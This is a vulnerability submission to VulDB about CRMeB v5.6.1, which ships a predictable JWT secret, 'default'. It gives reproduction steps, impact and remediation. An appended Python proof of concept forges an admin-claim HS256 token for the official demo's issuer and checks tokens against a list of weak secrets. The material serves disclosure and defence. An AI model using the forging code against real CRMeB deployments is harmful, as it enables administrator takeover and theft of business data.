Submission #659843: CRMeB v5.6.1 Use of hard-coded / weak cryptographic key (CWE-321 / CWE-798) — Information

Title: CRMeB v5.6.1 Use of hard-coded / weak cryptographic key (CWE-321 / CWE-798) —

Description:

CRMeB ships with a weak, predictable default JWT HMAC secret whose value is set to "default". The official demo instance (v5.crmeb.net) and fresh deployments use the same default secret. Because the HMAC secret is known/predictable, an attacker can sign arbitrary HS256 JWTs that the server will accept. This allows forging tokens that impersonate any user (including administrators), resulting in authentication bypass, privilege escalation (administrator takeover), and unauthorized access to protected APIs and sensitive business data.

Reproduction (concise)
1. Obtain a JWT issued by the CRMeB demo, or deploy a fresh CRMeB instance.
2. Confirm the iss claim (e.g., v5.crmeb.net) in the token payload.
3. Use the known secret "default" to sign an HS256 JWT with elevated claims (for example, {"jti":{"id":5,"type":"admin"}}).
4. Send the forged token as Authorization: Bearer <forged_jwt> to protected/admin endpoints. The server accepts the token and grants access.

Evidence
• Observed JWT from the demo: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9....V3jebfZZJPpfLBT0TTu53rxSZfaNB4U-zusdikcJSFk (full token available).
• Recovered HMAC secret: default.
• The iss claim points to v5.crmeb.net, confirming demo origin.

Impact
• Authentication bypass (any account impersonation)
• Privilege escalation / administrator takeover
• Unauthorized access and potential data exfiltration

Suggested remediation (short)
• Remove hard-coded/weak default secrets. Generate a strong random JWT secret at install time and require administrators to set/rotate it.
• Invalidate tokens signed with the default secret and add documentation/warnings about secret management.

Official demonstration website address: https://v5.crmeb.net/admin/login?redirect=%2Fadmin%2Findex
User: BlackSpdier (UID 89912)
Submitted: 22.09.2025 11:01 (7 months ago)
Moderated: 04.10.2025 20:31 (12 days later)
Status: accepted
VulDB entry: 327171 [CRMEB up to 5.6.1 JWT HMAC Secret secret weak encryption]
Points: 17
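The forgery described in the submission, and the check a defender would run against a captured token, as an added example (not code from the submitter or from the CRMeB project). It implements HS256 signing and verification with only the Python standard library, forges a token carrying the iss value and the admin jti claim quoted in the submission, and shows that a verifier keyed with "default" accepts it while a verifier keyed with a freshly generated random secret rejects it. The candidate-secret list and the exact payload layout are constructed for illustration; the only value taken from the submission is the secret "default".

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional

# Header used by HS256 JWTs. Its base64url form "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9"
# is the first segment of the token quoted in the submission.
HEADER = {"typ": "JWT", "alg": "HS256"}

# Constructed candidate list for a default-secret check. "default" is the value
# named in the submission; the others are generic guesses, not CRMeB values.
WEAK_SECRETS = ["default", "secret", "jwt", "123456", "crmeb"]


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def sign_hs256(payload: dict, secret: str) -> str:
    """Produce header.payload.signature with HMAC-SHA256 over the first two segments."""
    signing_input = ".".join(
        _b64url(json.dumps(part, separators=(",", ":")).encode())
        for part in (HEADER, payload)
    )
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + _b64url(sig)


def verify_hs256(token: str, secret: str) -> Optional[dict]:
    """Return the payload if the token is a valid HS256 JWT under `secret`, else None."""
    try:
        header_b64, payload_b64, sig_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        provided = _b64url_decode(sig_b64)
    except (ValueError, UnicodeDecodeError):
        return None
    # Pin the algorithm: a verifier that trusts header["alg"] is open to
    # "none" / key-confusion attacks on top of the weak-secret problem.
    if header.get("alg") != "HS256":
        return None
    expected = hmac.new(
        secret.encode(), f"{header_b64}.{payload_b64}".encode(), hashlib.sha256
    ).digest()
    if not hmac.compare_digest(expected, provided):
        return None
    return json.loads(_b64url_decode(payload_b64))


def forge_admin_token(secret: str = "default") -> str:
    """Attacker side: sign elevated claims with the predictable secret (step 3)."""
    payload = {"iss": "v5.crmeb.net", "jti": {"id": 5, "type": "admin"}}
    return sign_hs256(payload, secret)


def recover_weak_secret(token: str, candidates=WEAK_SECRETS) -> Optional[str]:
    """Defender side: does a captured token verify under any known weak secret?"""
    for cand in candidates:
        if verify_hs256(token, cand) is not None:
            return cand
    return None


def generate_strong_secret() -> str:
    """Remediation: an install-time random secret (384 bits, URL-safe)."""
    return secrets.token_urlsafe(48)


def demo() -> dict:
    forged = forge_admin_token("default")
    return {
        "forged": forged,
        "accepted_by_default_secret": verify_hs256(forged, "default"),
        "accepted_by_strong_secret": verify_hs256(forged, generate_strong_secret()),
        "recovered_secret": recover_weak_secret(forged),
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Running `recover_weak_secret` against a token minted by your own deployment is the quickest way to confirm whether the shipped default is still in use; a non-None result means every token ever issued under that secret must be treated as forgeable and the secret rotated.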
